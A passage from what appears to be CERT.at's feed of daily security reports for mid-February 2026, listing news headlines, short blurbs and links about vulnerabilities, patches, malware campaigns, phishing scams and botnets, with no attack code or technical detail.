&lt;h3&gt;Flaws in popular VSCode extensions expose developers to attacks&lt;/h3&gt;

Vulnerabilities with high to critical severity ratings affecting popular Visual Studio Code (VSCode) extensions collectively downloaded more than 128 million times could be exploited to steal local files and execute code remotely.
&lt;p /&gt;
&lt;A HREF=&quot;https://www.bleepingcomputer.com/news/security/flaws-in-popular-vscode-extensions-expose-developers-to-attacks/&quot;&gt;https://www.bleepingcomputer.com/news/security/flaws-in-popular-vscode-extensions-expose-developers-to-attacks/&lt;/a&gt;

&lt;hr&gt;

&lt;h3&gt;Notepad++ Fixes Hijacked Update Mechanism Used to Deliver Targeted Malware&lt;/h3&gt;

Notepad++ has released a security fix to plug gaps that were exploited by an advanced threat actor from China to hijack the software update mechanism to selectively deliver malware to targets of interest.
&lt;p /&gt;
&lt;A HREF=&quot;https://thehackernews.com/2026/02/notepad-fixes-hijacked-update-mechanism.html&quot;&gt;https://thehackernews.com/2026/02/notepad-fixes-hijacked-update-mechanism.html&lt;/a&gt;

&lt;hr&gt;

&lt;h3&gt;Microsoft warns of critical privilege escalation vulnerability in Windows Admin Center&lt;/h3&gt;

In Windows Admin Center, attackers can escalate their privileges. Microsoft rates this as critical and advises admins to update.
&lt;p /&gt;
&lt;A HREF=&quot;https://www.heise.de/news/Microsoft-warnt-vor-kritischer-Rechteausweitungsluecke-in-Windows-Admin-Center-11180525.html&quot;&gt;https://www.heise.de/news/Microsoft-warnt-vor-kritischer-Rechteausweitungsluecke-in-Windows-Admin-Center-11180525.html&lt;/a&gt;

&lt;hr&gt;

&lt;h3&gt;From BRICKSTORM to GRIMBOLT: UNC6201 Exploiting a Dell RecoverPoint for Virtual Machines Zero-Day&lt;/h3&gt;

Mandiant and Google Threat Intelligence Group (GTIG) have identified the zero-day exploitation of a high-risk vulnerability in Dell RecoverPoint for Virtual Machines, tracked as CVE-2026-22769, with a CVSSv3.0 score of 10.0.
&lt;p /&gt;
&lt;A HREF=&quot;https://cloud.google.com/blog/topics/threat-intelligence/unc6201-exploiting-dell-recoverpoint-zero-day/&quot;&gt;https://cloud.google.com/blog/topics/threat-intelligence/unc6201-exploiting-dell-recoverpoint-zero-day/&lt;/a&gt;

&lt;hr&gt;

&lt;h3&gt;Multiple Security-Updates for Splunk DB Connect - February 2026&lt;/h3&gt;
&lt;p /&gt;
&lt;A HREF=&quot;https://advisory.splunk.com&quot;&gt;https://advisory.splunk.com&lt;/a&gt;

&lt;hr&gt;

&lt;h3&gt;[R2] Stand-alone Security Patches Available for Tenable Security Center versions 6.5.1, 6.6.0 and 6.7.2: SC-202602.1 + SC-202602.2&lt;/h3&gt;
&lt;p /&gt;
&lt;A HREF=&quot;https://www.tenable.com/security/tns-2026-06&quot;&gt;https://www.tenable.com/security/tns-2026-06&lt;/a&gt;

&lt;hr&gt;

&lt;h3&gt;LWN Security updates for Wednesday&lt;/h3&gt;
&lt;p /&gt;
&lt;A HREF=&quot;https://lwn.net/Articles/1059333/&quot;&gt;https://lwn.net/Articles/1059333/&lt;/a&gt;</summary><dc:creator>CERT.at</dc:creator><dc:date>2026-02-18T18:25:57Z</dc:date></entry><entry><title>Daily summary - 17.02.2026</title><link rel="alternate" href="https://www.cert.at/de/tagesberichte/2026/2/tagesberichte-17022026"/><author><name>CERT.at</name></author><updated>2026-02-17T18:16:42Z</updated><published>2026-02-17T18:16:42Z</published><summary type="html">&lt;h2&gt;End-of-Day report&lt;/h2&gt;


Timeframe:   Monday 16-02-2026 18:00 - Tuesday 17-02-2026 18:00
Handler:     Michael Schlagenhaufer
Co-Handler:  Guenes Holler


&lt;h2&gt;      News       &lt;/h2&gt;


&lt;h3&gt;Divide and conquer: how the new Keenadu backdoor exposed links between major Android botnets&lt;/h3&gt;

Kaspersky experts have uncovered Keenadu, a sophisticated new backdoor targeting tablet firmware as well as system-level and Google Play apps. They also revealed connections between the world's most prolific Android botnets.
&lt;p /&gt;
&lt;A HREF=&quot;https://securelist.com/keenadu-android-backdoor/118913/&quot;&gt;https://securelist.com/keenadu-android-backdoor/118913/&lt;/a&gt;

&lt;hr&gt;

&lt;h3&gt;IT security agency CISA in emergency operation&lt;/h3&gt;

The DHS funding that lapsed over the weekend also affects the IT security agency CISA. It is now operating in emergency mode.
&lt;p /&gt;
&lt;A HREF=&quot;https://www.heise.de/news/IT-Sicherheitsbehoerde-CISA-im-Notbetrieb-11179136.html&quot;&gt;https://www.heise.de/news/IT-Sicherheitsbehoerde-CISA-im-Notbetrieb-11179136.html&lt;/a&gt;

&lt;hr&gt;

&lt;h3&gt;Security concerns: EU Parliament disables AI tools on work phones&lt;/h3&gt;

EU members of parliament and their staff can no longer use AI features on official smartphones and tablets. Too little is known about data security, it is said.
&lt;p /&gt;
&lt;A HREF=&quot;https://heise.de/-11179064&quot;&gt;https://heise.de/-11179064&lt;/a&gt;

&lt;hr&gt;

&lt;h3&gt;Password managers offer less protection than promised&lt;/h3&gt;

Researchers at ETH Zurich have discovered serious security vulnerabilities in three popular cloud-based password managers. In tests, they were able to view and even modify stored passwords.
&lt;p /&gt;
&lt;A HREF=&quot;https://ethz.ch/de/news-und-veranstaltungen/eth-news/news/2026/02/passwortmanager-bieten-weniger-schutz-als-versprochen.html&quot;&gt;https://ethz.ch/de/news-und-veranstaltungen/eth-news/news/2026/02/passwortmanager-bieten-weniger-schutz-als-versprochen.html&lt;/a&gt;




&lt;h2&gt; Vulnerabilities &lt;/h2&gt;


&lt;h3&gt;More than 60 security problems fixed in AI assistant OpenClaw&lt;/h3&gt;

In the context of OpenClaw, attackers can, among other things, push malicious code onto systems and execute it. Security patches are available.
&lt;p /&gt;
&lt;A HREF=&quot;https://heise.de/-11179150&quot;&gt;https://heise.de/-11179150&lt;/a&gt;

&lt;hr&gt;

&lt;h3&gt;CleanTalk WordPress Plugin Vulnerability Puts 200,000 Sites at Risk&lt;/h3&gt;

A WordPress plugin vulnerability has placed as many as 200,000 websites at potential risk, following the disclosure of a severe flaw in the CleanTalk Anti-Spam plugin. The issue, tracked as CVE-2026-1490, carries a CVSS severity rating of 9.8 out of 10 and could allow unauthenticated attackers to install arbitrary plugins, opening the door to remote code execution under certain conditions.
&lt;p /&gt;
&lt;A HREF=&quot;https://thecyberexpress.com/cleantalk-cve-2026-1490/&quot;&gt;https://thecyberexpress.com/cleantalk-cve-2026-1490/&lt;/a&gt;

&lt;hr&gt;

&lt;h3&gt;LWN Security updates for Tuesday&lt;/h3&gt;
&lt;p /&gt;
&lt;A HREF=&quot;https://lwn.net/Articles/1059176/&quot;&gt;https://lwn.net/Articles/1059176/&lt;/a&gt;</summary><dc:creator>CERT.at</dc:creator><dc:date>2026-02-17T18:16:42Z</dc:date></entry><entry><title>Daily summary - 16.02.2026</title><link rel="alternate" href="https://www.cert.at/de/tagesberichte/2026/2/tagesberichte-16022026"/><author><name>CERT.at</name></author><updated>2026-02-16T18:11:58Z</updated><published>2026-02-16T18:11:58Z</published><summary type="html">&lt;h2&gt;End-of-Day report&lt;/h2&gt;


Timeframe:   Friday 13-02-2026 18:00 - Monday 16-02-2026 18:00
Handler:     Alexander Riepl
Co-Handler:  Guenes Holler


&lt;h2&gt;      News       &lt;/h2&gt;


&lt;h3&gt;Pastebin comments push ClickFix JavaScript attack to hijack crypto swaps&lt;/h3&gt;

Threat actors are abusing Pastebin comments to distribute a new ClickFix-style attack that tricks cryptocurrency users into executing malicious JavaScript in their browser, allowing attackers to hijack Bitcoin swap transactions and redirect funds to attacker-controlled wallets.
&lt;p /&gt;
&lt;A HREF=&quot;https://www.bleepingcomputer.com/news/security/pastebin-comments-push-clickfix-javascript-attack-to-hijack-crypto-swaps/&quot;&gt;https://www.bleepingcomputer.com/news/security/pastebin-comments-push-clickfix-javascript-attack-to-hijack-crypto-swaps/&lt;/a&gt;

&lt;hr&gt;

&lt;h3&gt;Romo: DJI robot vacuum hacked&lt;/h3&gt;

A security vulnerability in the DJI Romo robot vacuum allowed access to around 7,000 devices worldwide, including live cameras and floor plans of homes.
&lt;p /&gt;
&lt;A HREF=&quot;https://www.golem.de/news/romo-dji-staubsaugerroboter-gehackt-2602-205411.html&quot;&gt;https://www.golem.de/news/romo-dji-staubsaugerroboter-gehackt-2602-205411.html&lt;/a&gt;

&lt;hr&gt;

&lt;h3&gt;Fake e-mail about a crypto reporting obligation: new scam in circulation&lt;/h3&gt;

An e-mail is currently appearing in numerous inboxes that supposedly comes from the Federal Ministry of Finance and announces an &quot;urgent reporting obligation&quot; for crypto assets. According to it, even people without cryptocurrencies are supposed to fill out a form. The message looks legitimate but is a well-made phishing trap.
&lt;p /&gt;
&lt;A HREF=&quot;https://www.watchlist-internet.at/news/gefaelschte-e-mail-zur-kryptomeldepflicht/&quot;&gt;https://www.watchlist-internet.at/news/gefaelschte-e-mail-zur-kryptomeldepflicht/&lt;/a&gt;

&lt;hr&gt;

&lt;h3&gt;Phishing on the Edge of the Web and Mobile Using QR Codes&lt;/h3&gt;

We discuss the extensive use of malicious QR codes using URL shorteners, in-app deep links and direct APK downloads to bypass mobile security.
&lt;p /&gt;
&lt;A HREF=&quot;https://unit42.paloaltonetworks.com/qr-codes-as-attack-vector/&quot;&gt;https://unit42.paloaltonetworks.com/qr-codes-as-attack-vector/&lt;/a&gt;




&lt;h2&gt; Vulnerabilities &lt;/h2&gt;


&lt;h3&gt;Security vulnerability in the browser: attacks on Chrome users observed&lt;/h3&gt;

A dangerous security vulnerability lets attackers inject malicious code into Chrome. Visiting a specially crafted website is enough.
&lt;p /&gt;
&lt;A HREF=&quot;https://www.golem.de/news/sicherheitsluecke-im-browser-attacken-auf-chrome-nutzer-beobachtet-2602-205443.html&quot;&gt;https://www.golem.de/news/sicherheitsluecke-im-browser-attacken-auf-chrome-nutzer-beobachtet-2602-205443.html&lt;/a&gt;

&lt;hr&gt;

&lt;h3&gt;ClickFix attacks use malicious code in DNS responses&lt;/h3&gt;

Microsoft has discovered a new variant of malware distribution in ClickFix attacks. The attackers deliver malicious code via DNS.
&lt;p /&gt;
&lt;A HREF=&quot;https://www.heise.de/news/ClickFix-Attacken-nutzen-Schadcode-in-DNS-Antworten-11177592.html&quot;&gt;https://www.heise.de/news/ClickFix-Attacken-nutzen-Schadcode-in-DNS-Antworten-11177592.html&lt;/a&gt;

&lt;hr&gt;

&lt;h3&gt;LWN Security updates for Monday&lt;/h3&gt;
&lt;p /&gt;
&lt;A HREF=&quot;https://lwn.net/Articles/1058989/&quot;&gt;https://lwn.net/Articles/1058989/&lt;/a&gt;</summary><dc:creator>CERT.at</dc:creator><dc:date>2026-02-16T18:11:58Z</dc:date></entry><entry><title>Daily summary - 13.02.2026</title><link rel="alternate" href="https://www.cert.at/de/tagesberichte/2026/2/tagesberichte-13022026"/><author><name>CERT.at</name></author><updated>2026-02-13T18:28:16Z</updated><published>2026-02-13T18:28:16Z</published><summary type="html">&lt;h2&gt;End-of-Day report&lt;/h2&gt;


Timeframe:   Thursday 12-02-2026 18:00 - Friday 13-02-2026 18:00
Handler:     Michael Schlagenhaufer
Co-Handler:  Felician Fuchs


&lt;h2&gt;      News       &lt;/h2&gt;


&lt;h3&gt;Microsoft: New Windows LNK spoofing issues aren't vulnerabilities&lt;/h3&gt;

Today, at Wild West Hackin' Fest, security researcher Wietze Beukema disclosed multiple vulnerabilities in Windows LNK shortcut files that allow attackers to deploy malicious payloads.
&lt;p /&gt;
&lt;A HREF=&quot;https://www.bleepingcomputer.com/news/microsoft/microsoft-new-windows-lnk-spoofing-issues-arent-vulnerabilities/&quot;&gt;https://www.bleepingcomputer.com/news/microsoft/microsoft-new-windows-lnk-spoofing-issues-arent-vulnerabilities/&lt;/a&gt;

&lt;hr&gt;

&lt;h3&gt;Ivanti EPMM Zero-Day Bugs Spark Exploit Frenzy - Again&lt;/h3&gt;

A handful of European government agencies have been compromised by hackers in recent weeks, thanks to a new round of critical vulnerabilities in an Ivanti product - and it's another grim reminder of the heyday attackers have been having with edge devices.
&lt;p /&gt;
&lt;A HREF=&quot;https://www.darkreading.com/endpoint-security/ivanti-epmm-zero-day-bugs-exploit&quot;&gt;https://www.darkreading.com/endpoint-security/ivanti-epmm-zero-day-bugs-exploit&lt;/a&gt;

&lt;hr&gt;

&lt;h3&gt;37 million downloads: 287 Chrome extensions caught spying&lt;/h3&gt;

Researchers analyzed the traffic of numerous Chrome extensions. 287 of them spy on browsing behavior for data brokers.
&lt;p /&gt;
&lt;A HREF=&quot;https://www.golem.de/news/37-millionen-downloads-287-chrome-extensions-bei-der-spionage-erwischt-2602-205381.html&quot;&gt;https://www.golem.de/news/37-millionen-downloads-287-chrome-extensions-bei-der-spionage-erwischt-2602-205381.html&lt;/a&gt;

&lt;hr&gt;

&lt;h3&gt;Bypassing Administrator Protection by Abusing UI Access&lt;/h3&gt;

In my last blog post I introduced the new Windows feature, Administrator Protection and how it aimed to create a secure boundary for UAC where one didn't exist. I described one of the ways I was able to bypass the feature before it was released. In total I found 9 bypasses during my research that have now all been fixed. In this blog post I wanted to describe the root cause of 5 of those 9 issues, specifically the implementation of UI Access, how this has been a long standing problem with UAC that's been under-appreciated, and how it's being fixed now.
&lt;p /&gt;
&lt;A HREF=&quot;https://projectzero.google/2026/02/windows-administrator-protection.html&quot;&gt;https://projectzero.google/2026/02/windows-administrator-protection.html&lt;/a&gt;

&lt;hr&gt;

&lt;h3&gt;IPFire introduces free domain blocklist DBL&lt;/h3&gt;

The IPFire developers have published DBL, a categorised domain blocklist. It is intended to block malware, phishing and trackers.
&lt;p /&gt;
&lt;A HREF=&quot;https://www.heise.de/news/IPFire-stellt-freie-Domain-Blockliste-DBL-vor-11175994.html&quot;&gt;https://www.heise.de/news/IPFire-stellt-freie-Domain-Blockliste-DBL-vor-11175994.html&lt;/a&gt;

&lt;hr&gt;

&lt;h3&gt;How to find and remove credential-stealing Chrome extensions&lt;/h3&gt;

Researchers have uncovered 30 Chrome extensions stealing user data. Here's how to check your browser and remove any malicious extensions step by step.
&lt;p /&gt;
&lt;A HREF=&quot;https://www.malwarebytes.com/blog/news/2026/02/how-to-find-and-remove-credential-stealing-chrome-extensions&quot;&gt;https://www.malwarebytes.com/blog/news/2026/02/how-to-find-and-remove-credential-stealing-chrome-extensions&lt;/a&gt;

&lt;hr&gt;

&lt;h3&gt;Beware, Trojan! Circulating messages about copyright infringements are fakes!&lt;/h3&gt;

Using phishing messages in the name of real, existing companies, criminals are currently trying to sneak malware onto their victims' devices. The accusations raised are of course entirely fabricated, but the attached document is highly dangerous.
&lt;p /&gt;
&lt;A HREF=&quot;https://www.watchlist-internet.at/news/vorsicht-trojaner-urheberrechtsverletzungen/&quot;&gt;https://www.watchlist-internet.at/news/vorsicht-trojaner-urheberrechtsverletzungen/&lt;/a&gt;

&lt;hr&gt;

&lt;h3&gt;Urgent warnings from UK and US cyber agencies after Polish energy grid attack&lt;/h3&gt;

A coordinated cyberattack that targeted Poland's energy infrastructure in late December 2025 has prompted cybersecurity agencies to issue urgent warnings to critical national infrastructure operators on both sides of the Atlantic.
&lt;p /&gt;
&lt;A HREF=&quot;https://www.fortra.com/blog/urgent-warnings-uk-and-us-cyber-agencies-after-polish-energy-grid-attack&quot;&gt;https://www.fortra.com/blog/urgent-warnings-uk-and-us-cyber-agencies-after-polish-energy-grid-attack&lt;/a&gt;

&lt;hr&gt;

&lt;h3&gt;Naming and shaming: How ransomware groups tighten the screws on victims&lt;/h3&gt;

When corporate data is exposed on a dedicated leak site, the consequences linger long after the attack fades from the news cycle.
&lt;p /&gt;
&lt;A HREF=&quot;https://www.welivesecurity.com/en/ransomware/naming-shaming-ransomware-groups-tighten-screws-victims/&quot;&gt;https://www.welivesecurity.com/en/ransomware/naming-shaming-ransomware-groups-tighten-screws-victims/&lt;/a&gt;

&lt;hr&gt;

&lt;h3&gt;Lawful access to encrypted data: why is this so hard to do?&lt;/h3&gt;

As I am now a member of the EU expert group which is tasked with coming up with a solution, I have been thinking a lot about this problem. An interesting train of thought turned out to be the question &quot;We managed to give Law Enforcement (LE) wiretapping powers in old-style phone networks, but not in modern, Internet-based communication services. Why?&quot;
&lt;p /&gt;
&lt;A HREF=&quot;https://www.cert.at/en/blog/2026/2/lawful-access-to-encrypted-data-why-is-this-so-hard-to-do&quot;&gt;https://www.cert.at/en/blog/2026/2/lawful-access-to-encrypted-data-why-is-this-so-hard-to-do&lt;/a&gt;

&lt;hr&gt;

&lt;h3&gt;8,000+ ChatGPT API Keys Left Publicly Accessible&lt;/h3&gt;

The rapid integration of artificial intelligence into mainstream software development has introduced a new category of security risk, one that many organizations are still unprepared to manage. According to research conducted by Cyble Research and Intelligence Labs (CRIL), thousands of exposed ChatGPT API keys are currently accessible across public infrastructure, dramatically lowering the barrier for abuse. CRIL identified more than 5,000 publicly accessible GitHub repositories containing
&lt;p /&gt;
&lt;A HREF=&quot;https://thecyberexpress.com/exposed-chatgpt-api-keys-github-websites/&quot;&gt;https://thecyberexpress.com/exposed-chatgpt-api-keys-github-websites/&lt;/a&gt;




&lt;h2&gt; Vulnerabilities &lt;/h2&gt;


&lt;h3&gt;Patch now! Attackers are targeting BeyondTrust remote support solutions&lt;/h3&gt;

Attackers are exploiting a critical code-execution vulnerability in BeyondTrust Remote Support and Privileged Remote Access. Security patches are available.
&lt;p /&gt;
&lt;A HREF=&quot;https://www.heise.de/news/Jetzt-patchen-Angreifer-attackieren-BeyondTrust-Fernwartungsloesungen-11175384.html&quot;&gt;https://www.heise.de/news/Jetzt-patchen-Angreifer-attackieren-BeyondTrust-Fernwartungsloesungen-11175384.html&lt;/a&gt;

&lt;hr&gt;

&lt;h3&gt;Qnap NAS: Unauthorised file system access possible&lt;/h3&gt;

Security patches for Qnap's NAS operating systems QTS and QuTS hero close several vulnerabilities.
&lt;p /&gt;
&lt;A HREF=&quot;https://www.heise.de/news/Qnap-NAS-Unbefugte-Dateisystemzugriffe-moeglich-11175677.html&quot;&gt;https://www.heise.de/news/Qnap-NAS-Unbefugte-Dateisystemzugriffe-moeglich-11175677.html&lt;/a&gt;

&lt;hr&gt;

&lt;h3&gt;LWN Security updates for Friday&lt;/h3&gt;
&lt;p /&gt;
&lt;A HREF=&quot;https://lwn.net/Articles/1058642/&quot;&gt;https://lwn.net/Articles/1058642/&lt;/a&gt;</summary><dc:creator>CERT.at</dc:creator><dc:date>2026-02-13T18:28:16Z</dc:date></entry><entry><title>Tageszusammenfassung - 12.02.2026</title><link rel="alternate" href="https://www.cert.at/de/tagesberichte/2026/2/tagesberichte-12022026"/><author><name>CERT.at</name></author><updated>2026-02-12T19:22:45Z</updated><published>2026-02-12T19:22:45Z</published><summary type="html">&lt;h2&gt;End-of-Day report&lt;/h2&gt;


Timeframe:   Wednesday 11-02-2026 18:00 - Thursday 12-02-2026 18:00
Handler:     Michael Schlagenhaufer
Co-Handler:  Felician Fuchs


&lt;h2&gt;      News       &lt;/h2&gt;


&lt;h3&gt;Crazy ransomware gang abuses employee monitoring tool in attacks&lt;/h3&gt;

A member of the Crazy ransomware gang is abusing legitimate employee monitoring software and the SimpleHelp remote support tool to maintain persistence in corporate networks, evade detection, and prepare for ransomware deployment.
&lt;p /&gt;
&lt;A HREF=&quot;https://www.bleepingcomputer.com/news/security/crazy-ransomware-gang-abuses-employee-monitoring-tool-in-attacks/&quot;&gt;https://www.bleepingcomputer.com/news/security/crazy-ransomware-gang-abuses-employee-monitoring-tool-in-attacks/&lt;/a&gt;

&lt;hr&gt;

&lt;h3&gt;Microsoft Store Outlook add-in hijacked to steal 4,000 Microsoft accounts&lt;/h3&gt;

The AgreeTo add-in for Outlook has been hijacked and turned into a phishing kit that stole more than 4,000 Microsoft account credentials. [..] Office add-ins are just URLs pointing to content loaded into Microsoft products from the developer's server. In the case of AgreeTo, the developer used a Vercel-hosted URL (outlook-one.vercel.app) but abandoned the project, despite the userbase it formed. [..] The case of AgreeTo stands out, though, as it is likely the first to be hosted on Microsoft's Marketplace.
&lt;p /&gt;
&lt;A HREF=&quot;https://www.bleepingcomputer.com/news/security/microsoft-store-outlook-add-in-hijacked-to-steal-4-000-microsoft-accounts/&quot;&gt;https://www.bleepingcomputer.com/news/security/microsoft-store-outlook-add-in-hijacked-to-steal-4-000-microsoft-accounts/&lt;/a&gt;

&lt;hr&gt;

&lt;h3&gt;Fraudulent Post e-mails in circulation&lt;/h3&gt;

Invoices from the Post sent by e-mail are often fake. A variant is currently circulating in which 9.30 euros are supposedly to be paid for a shipment. Clicking the button leads to a phishing website where credit card data can be stolen.
&lt;p /&gt;
&lt;A HREF=&quot;https://www.watchlist-internet.at/news/betruegerische-post-emails-im-umlauf/&quot;&gt;https://www.watchlist-internet.at/news/betruegerische-post-emails-im-umlauf/&lt;/a&gt;

&lt;hr&gt;

&lt;h3&gt;Nation-State Actors Exploit Notepad++ Supply Chain&lt;/h3&gt;

Between June and December 2025, the official hosting infrastructure for the text editor Notepad++ was compromised by a state-sponsored threat group known as Lotus Blossom. The attackers breached the shared hosting provider's environment. [..] We've identified additional unreported infrastructure, which is linked to this campaign.
&lt;p /&gt;
&lt;A HREF=&quot;https://unit42.paloaltonetworks.com/notepad-infrastructure-compromise/&quot;&gt;https://unit42.paloaltonetworks.com/notepad-infrastructure-compromise/&lt;/a&gt;

&lt;hr&gt;

&lt;h3&gt;Critical vulnerabilities in various Linksys routers&lt;/h3&gt;

Linksys routers contain vulnerabilities that can lead to an unauthenticated and complete compromise of the devices over the internet. The manufacturer Linksys has provided an update for affected devices, which however only prevents exploitation over the internet. [..] Shortly after discovering the vulnerabilities, a &quot;quick&quot; scan of the internet showed about 12.000 vulnerable devices. Around six months after the fix was available, this number shrunk to around 4.000. A reason for this large drop is probably that the Linksys routers support auto-update, which is enabled by default and installs new firmware updates without any user interaction.
&lt;p /&gt;
&lt;A HREF=&quot;https://www.syss.de/pentest-blog/schwachstellen-in-linksys-routern&quot;&gt;https://www.syss.de/pentest-blog/schwachstellen-in-linksys-routern&lt;/a&gt;

&lt;hr&gt;

&lt;h3&gt;US wants cyber partnerships to send &quot;coordinated, strategic message&quot; to adversaries&lt;/h3&gt;

National Cyber Director Sean Cairncross told attendees of the Munich Cyber Security Conference that Washington is looking to deepen cooperation with partners rather than act alone.
&lt;p /&gt;
&lt;A HREF=&quot;https://therecord.media/us-wants-cyber-partnerships-to-send-message-to-adversaries&quot;&gt;https://therecord.media/us-wants-cyber-partnerships-to-send-message-to-adversaries&lt;/a&gt;

&lt;hr&gt;

&lt;h3&gt;GTIG AI Threat Tracker: Distillation, Experimentation, and (Continued) Integration of AI for Adversarial Use&lt;/h3&gt;

In the final quarter of 2025, Google Threat Intelligence Group (GTIG) observed threat actors increasingly integrating artificial intelligence (AI) to accelerate the attack lifecycle, achieving productivity gains in reconnaissance, social engineering, and malware development. This report serves as an update to our November 2025 findings regarding the advances in threat actor usage of AI tools.
&lt;p /&gt;
&lt;A HREF=&quot;https://cloud.google.com/blog/topics/threat-intelligence/distillation-experimentation-integration-ai-adversarial-use/&quot;&gt;https://cloud.google.com/blog/topics/threat-intelligence/distillation-experimentation-integration-ai-adversarial-use/&lt;/a&gt;

&lt;hr&gt;

&lt;h3&gt;Scary Agent Skills: Hidden Unicode Instructions in Skills ... And How To Catch Them&lt;/h3&gt;

There is a lot of talk about Skills recently, both in terms of capabilities and security concerns. However, so far I haven't seen anyone bring up hidden prompt injection. So, I figured I would demo a Skills supply chain backdoor that survives human review.
&lt;p /&gt;
&lt;A HREF=&quot;https://embracethered.com/blog/posts/2026/scary-agent-skills/&quot;&gt;https://embracethered.com/blog/posts/2026/scary-agent-skills/&lt;/a&gt;




&lt;h2&gt; Vulnerabilities &lt;/h2&gt;


&lt;h3&gt;Apple Fixes Exploited Zero-Day Affecting iOS, macOS, and Apple Devices&lt;/h3&gt;

Apple on Wednesday released iOS, iPadOS, macOS Tahoe, tvOS, watchOS, and visionOS updates to address a zero-day flaw that it said has been exploited in sophisticated cyber attacks.
&lt;p /&gt;
&lt;A HREF=&quot;https://thehackernews.com/2026/02/apple-fixes-exploited-zero-day.html&quot;&gt;https://thehackernews.com/2026/02/apple-fixes-exploited-zero-day.html&lt;/a&gt;

&lt;hr&gt;

&lt;h3&gt;Dell closes countless security vulnerabilities in Avamar, iDRAC and NetWorker&lt;/h3&gt;

In three advisories, Dell lists the now-closed security vulnerabilities in third-party components that affect Avamar and NetWorker. [..] These include components such as Apache HTTP Server, Expat, OpenSSL and Vim. The majority of the closed vulnerabilities date from 2025. Among them are also &quot;critical&quot; vulnerabilities (for instance Samba CVE-2025-10230) through which malicious code can reach systems.
&lt;p /&gt;
&lt;A HREF=&quot;https://www.heise.de/news/Dell-schliesst-unzaehlige-Sicherheitsluecken-in-Avamar-iDRAC-und-NetWorker-11173829.html&quot;&gt;https://www.heise.de/news/Dell-schliesst-unzaehlige-Sicherheitsluecken-in-Avamar-iDRAC-und-NetWorker-11173829.html&lt;/a&gt;

&lt;hr&gt;

&lt;h3&gt;Fortinet: LDAP authentication bypass in Agentless VPN and FSSO&lt;/h3&gt;

An Authentication Bypass by Primary Weakness vulnerability [CWE-305] in FortiOS fnbamd may allow an unauthenticated attacker to bypass LDAP authentication of Agentless VPN or FSSO policy, under specific LDAP server configuration. CVE-2026-22153
&lt;p /&gt;
&lt;A HREF=&quot;https://www.fortiguard.com/psirt/FG-IR-25-1052&quot;&gt;https://www.fortiguard.com/psirt/FG-IR-25-1052&lt;/a&gt;

&lt;hr&gt;

&lt;h3&gt;High-Severity RCE Vulnerability Disclosed in next-mdx-remote&lt;/h3&gt;

HashiCorp has published HCSEC-2026-01, disclosing a high-severity vulnerability in the popular next-mdx-remote library that can lead to arbitrary code execution when rendering untrusted MDX content on the server. The issue is tracked as CVE-2026-0969 (GHSA-g4xw-jxrg-5f6m) and carries a CVSS 3.1 score of 8.8 (High). [..] It is fixed in version 6.0.0. [..] For clarity, this is not a vulnerability in Next.js itself. It affects applications that use next-mdx-remote to compile untrusted MDX content on the server.
&lt;p /&gt;
&lt;A HREF=&quot;https://socket.dev/blog/high-severity-rce-vulnerability-disclosed-in-next-mdx-remote&quot;&gt;https://socket.dev/blog/high-severity-rce-vulnerability-disclosed-in-next-mdx-remote&lt;/a&gt;

&lt;hr&gt;

&lt;h3&gt;Multiple Vulnerabilities in various Solax Power Pocket WiFi models&lt;/h3&gt;
&lt;p /&gt;
&lt;A HREF=&quot;https://sec-consult.com/vulnerability-lab/advisory/multiple-vulnerabilities-in-various-solax-power-pocket-wifi-models/&quot;&gt;https://sec-consult.com/vulnerability-lab/advisory/multiple-vulnerabilities-in-various-solax-power-pocket-wifi-models/&lt;/a&gt;

&lt;hr&gt;

&lt;h3&gt;LWN Security updates for Thursday&lt;/h3&gt;
&lt;p /&gt;
&lt;A HREF=&quot;https://lwn.net/Articles/1058473/&quot;&gt;https://lwn.net/Articles/1058473/&lt;/a&gt;</summary><dc:creator>CERT.at</dc:creator><dc:date>2026-02-12T19:22:45Z</dc:date></entry><entry><title>Tageszusammenfassung - 11.02.2026</title><link rel="alternate" href="https://www.cert.at/de/tagesberichte/2026/2/tagesberichte-11022026"/><author><name>CERT.at</name></author><updated>2026-02-11T19:13:57Z</updated><published>2026-02-11T19:13:57Z</published><summary type="html">&lt;h2&gt;End-of-Day report&lt;/h2&gt;


Timeframe:   Tuesday 10-02-2026 18:00 - Wednesday 11-02-2026 18:00
Handler:     Guenes Holler
Co-Handler:  Felician Fuchs


&lt;h2&gt;      News       &lt;/h2&gt;


&lt;h3&gt;New Linux botnet SSHStalker uses old-school IRC for C2 comms&lt;/h3&gt;

A newly documented Linux botnet named SSHStalker is using the IRC (Internet Relay Chat) communication protocol for command-and-control (C2) operations.
&lt;p /&gt;
&lt;A HREF=&quot;https://www.bleepingcomputer.com/news/security/new-linux-botnet-sshstalker-uses-old-school-irc-for-c2-comms/&quot;&gt;https://www.bleepingcomputer.com/news/security/new-linux-botnet-sshstalker-uses-old-school-irc-for-c2-comms/&lt;/a&gt;

&lt;hr&gt;

&lt;h3&gt;In Bypassing MFA, ZeroDayRAT Is Textbook Stalkerware&lt;/h3&gt;

With access to SIM, location data, and a preview of recent SMSes, attackers have everything they need for account takeover or targeted social engineering.
&lt;p /&gt;
&lt;A HREF=&quot;https://www.darkreading.com/threat-intelligence/zerodayrat-brings-commercial-spyware-to-mass-market&quot;&gt;https://www.darkreading.com/threat-intelligence/zerodayrat-brings-commercial-spyware-to-mass-market&lt;/a&gt;

&lt;hr&gt;

&lt;h3&gt;DPRK Operatives Impersonate Professionals on LinkedIn to Infiltrate Companies&lt;/h3&gt;

The information technology (IT) workers associated with the Democratic People's Republic of Korea (DPRK) are now applying to remote positions using real LinkedIn accounts of individuals they're impersonating, marking a new escalation of the fraudulent scheme.
&lt;p /&gt;
&lt;A HREF=&quot;https://thehackernews.com/2026/02/dprk-operatives-impersonate.html&quot;&gt;https://thehackernews.com/2026/02/dprk-operatives-impersonate.html&lt;/a&gt;

&lt;hr&gt;

&lt;h3&gt;Kimwolf Botnet Swamps Anonymity Network I2P&lt;/h3&gt;

For the past week, the massive &quot;Internet of Things&quot; (IoT) botnet known as Kimwolf has been disrupting the Invisible Internet Project (I2P), a decentralized, encrypted communications network designed to anonymize and secure online communications. I2P users started reporting disruptions in the network around the same time the Kimwolf botmasters began relying on it to evade takedown attempts against the botnet's control servers.
&lt;p /&gt;
&lt;A HREF=&quot;https://krebsonsecurity.com/2026/02/kimwolf-botnet-swamps-anonymity-network-i2p/&quot;&gt;https://krebsonsecurity.com/2026/02/kimwolf-botnet-swamps-anonymity-network-i2p/&lt;/a&gt;

&lt;hr&gt;

&lt;h3&gt;Shelly IoT door controller config fail: leaving your garage, home and security exposed&lt;/h3&gt;

